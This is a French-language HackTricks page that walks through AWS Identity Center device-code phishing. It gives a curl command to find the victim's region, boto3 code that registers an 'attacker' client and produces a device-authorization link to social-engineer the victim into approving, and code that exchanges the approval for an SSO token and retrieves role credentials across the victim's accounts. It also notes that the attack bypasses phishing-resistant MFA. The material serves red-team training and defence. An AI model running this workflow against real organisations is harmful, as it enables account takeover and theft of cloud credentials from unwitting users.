AWS - Identity Center & SSO Unauthenticated Enum

Apprenez et pratiquez le Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Apprenez et pratiquez le Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Soutenez HackTricks

AWS Device Code Phishing

Initialement proposé dans cet article de blog, il est possible d'envoyer un lien à un utilisateur utilisant AWS SSO qui, si l'utilisateur accepte, permettra à l'attaquant d'obtenir un jeton pour usurper l'identité de l'utilisateur et accéder à tous les rôles auxquels l'utilisateur peut accéder dans le Identity Center.

Pour réaliser cette attaque, les prérequis sont :

  • La victime doit utiliser Identity Center

  • L'attaquant doit connaître le sous-domaine utilisé par la victime <victimsub>.awsapps.com/start

Avec les informations précédentes, l'attaquant pourra envoyer un lien à l'utilisateur qui, s'il est accepté, accordera à l'attaquant l'accès au compte utilisateur AWS.

Attaque

  1. Trouver le sous-domaine

La première étape de l'attaquant est de découvrir le sous-domaine utilisé par l'entreprise victime dans leur Identity Center. Cela peut être fait via OSINT ou devinette + BF car la plupart des entreprises utiliseront leur nom ou une variation de leur nom ici.

Avec cette information, il est possible d'obtenir la région où l'Identity Center a été configuré avec :

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1
  1. Générer le lien pour la victime et l'envoyer

Exécutez le code suivant pour générer un lien de connexion AWS SSO afin que la victime puisse s'authentifier. Pour la démonstration, exécutez ce code dans une console python et ne la quittez pas car plus tard, vous aurez besoin de certains objets pour obtenir le token :

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

Envoyez le lien généré à la victime en utilisant vos compétences exceptionnelles en ingénierie sociale !

  1. Attendez que la victime l'accepte

Si la victime est déjà connectée à AWS, elle devra simplement accepter l'octroi des permissions. Si elle ne l'est pas, elle devra se connecter puis accepter l'octroi des permissions. Voici à quoi ressemble le prompt de nos jours :

  1. Obtenez le jeton d'accès SSO

Si la victime a accepté le prompt, exécutez ce code pour générer un jeton SSO en impersonnant l'utilisateur :

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

Le jeton d'accès SSO est valide pendant 8h.

  1. Usurper l'identité de l'utilisateur

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

Phishing the unphisable MFA

C'est amusant de savoir que l'attaque précédente fonctionne même si un "MFA non-phisable" (webAuth) est utilisé. Cela est dû au fait que le workflow précédent ne quitte jamais le domaine OAuth utilisé. Contrairement à d'autres attaques de phishing où l'utilisateur doit remplacer le domaine de connexion, dans ce cas, le workflow du code de l'appareil est préparé de sorte qu'un code soit connu par un appareil et que l'utilisateur puisse se connecter même sur une machine différente. Si l'invite est acceptée, l'appareil, simplement en connaissant le code initial, pourra récupérer les identifiants de l'utilisateur.

Pour plus d'informations à ce sujet consultez cet article.

Outils Automatiques

Références

Apprenez & pratiquez le Hacking AWS :HackTricks Training AWS Red Team Expert (ARTE) Apprenez & pratiquez le Hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenez HackTricks

Last updated